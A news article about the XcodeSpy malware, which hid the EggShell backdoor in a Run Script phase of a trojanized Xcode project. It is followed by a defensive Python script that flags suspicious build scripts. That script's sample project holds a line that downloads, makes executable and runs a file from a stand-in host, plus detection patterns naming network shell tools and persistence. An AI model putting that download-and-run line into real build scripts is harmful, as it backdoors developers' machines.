Security researchers discover ‘XcodeSpy’ malware targeting developers

Hot on the heels of a report detailing a surge in malware being developed for macOS, a new strain has been discovered that specifically targets developers.

As first reported today by Ars Technica, security researchers at SentinelOne have discovered a new piece of malware built specifically to target those creating apps. It’s actually a variant of the “EggShell” backdoor, developed for Mac computers. Although it is a variant, it’s still considered a new discovery.

The report outlines that the new malware is called “XcodeSpy” and is built as an Xcode project under the guise of TabBarInteraction. TabBarInteraction is a legitimate open source project, which is why developers can be duped into downloading the malicious copy.

Developers who install “XcodeSpy” are trying to download TabBarInteraction, but the trojanized project includes an executable “Run Script” which downloads and installs the EggShell backdoor. With the backdoor installed on a device, the cybercriminal can then access the camera, microphone, and keyboard. The individual can also download and upload software at will.

The initial timeline for this issue actually dates back to August of last year, with another variant cropping up in October. Per the report:

“We have thus far been unable to discover other samples of trojanized Xcode projects and cannot gauge the extent of this activity. However, the timeline from known samples and other indicators mentioned below suggest that other XcodeSpy projects may exist. By sharing details of this campaign, we hope to raise awareness of this attack vector and highlight the fact that developers are high-value targets for attackers.”

At the time of publication, there appears to be no fix for this particular issue. With that in mind, the security researchers say that the best possible solution for developers is to be wary of open source projects while using Xcode.
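
One way to act on that advice is to read a project's Run Script build phases before building it. The sketch below is an added example, not code from SentinelOne or the original report: it parses the PBXShellScriptBuildPhase entries of a project.pbxproj file and flags scripts that match a few heuristics. The heuristics and the sample project fragment are assumptions constructed for illustration.

```python
import re

# Constructed project.pbxproj fragment (sample input, not from any real project).
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
    AA0000000000000000000001 /* Lint */ = {
        isa = PBXShellScriptBuildPhase;
        name = Lint;
        shellPath = /bin/sh;
        shellScript = "swiftlint lint --quiet\n";
    };
    AA0000000000000000000002 /* Run Script */ = {
        isa = PBXShellScriptBuildPhase;
        name = "Run Script";
        shellPath = /bin/sh;
        shellScript = "curl -s https://example.invalid/a -o /tmp/.a && chmod +x /tmp/.a && /tmp/.a &\n";
    };
/* End PBXShellScriptBuildPhase section */
'''

# Illustrative heuristics chosen for this example (assumptions, not report indicators).
SUSPICIOUS = {
    "network fetch": re.compile(r"\b(curl|wget|nc|ncat)\b|/dev/tcp/"),
    "decode or eval": re.compile(r"\b(base64|eval|xxd)\b"),
    "makes file executable": re.compile(r"\bchmod\s+(\+x|[0-7]{3,4})\b"),
    "temp or hidden path": re.compile(r"/tmp/|/\.[A-Za-z]"),
    "persistence": re.compile(r"LaunchAgents|LaunchDaemons|launchctl"),
}
PHASE = re.compile(r"isa = PBXShellScriptBuildPhase;(.*?)\n\s*\};", re.S)
SCRIPT = re.compile(r'shellScript = "((?:[^"\\]|\\.)*)";')
NAME = re.compile(r'\bname = "?([^";]+)"?;')

def unescape(s):
    # pbxproj strings escape newlines, tabs and quotes with a backslash
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), s)

def audit_pbxproj(text):
    """Return (phase name, script, reasons) for every Run Script build phase."""
    findings = []
    for phase in PHASE.finditer(text):
        body = phase.group(1)
        script = SCRIPT.search(body)
        if not script:
            continue
        name = NAME.search(body)
        code = unescape(script.group(1))
        reasons = [label for label, rx in SUSPICIOUS.items() if rx.search(code)]
        findings.append((name.group(1) if name else "(unnamed)", code, reasons))
    return findings

if __name__ == "__main__":
    for name, code, reasons in audit_pbxproj(SAMPLE_PBXPROJ):
        print(f"[{'REVIEW' if reasons else 'ok'}] {name}: {', '.join(reasons) or 'no flags'}")
```

A phase with no flags still deserves a read before the first build; the heuristics only prioritise which scripts to look at first.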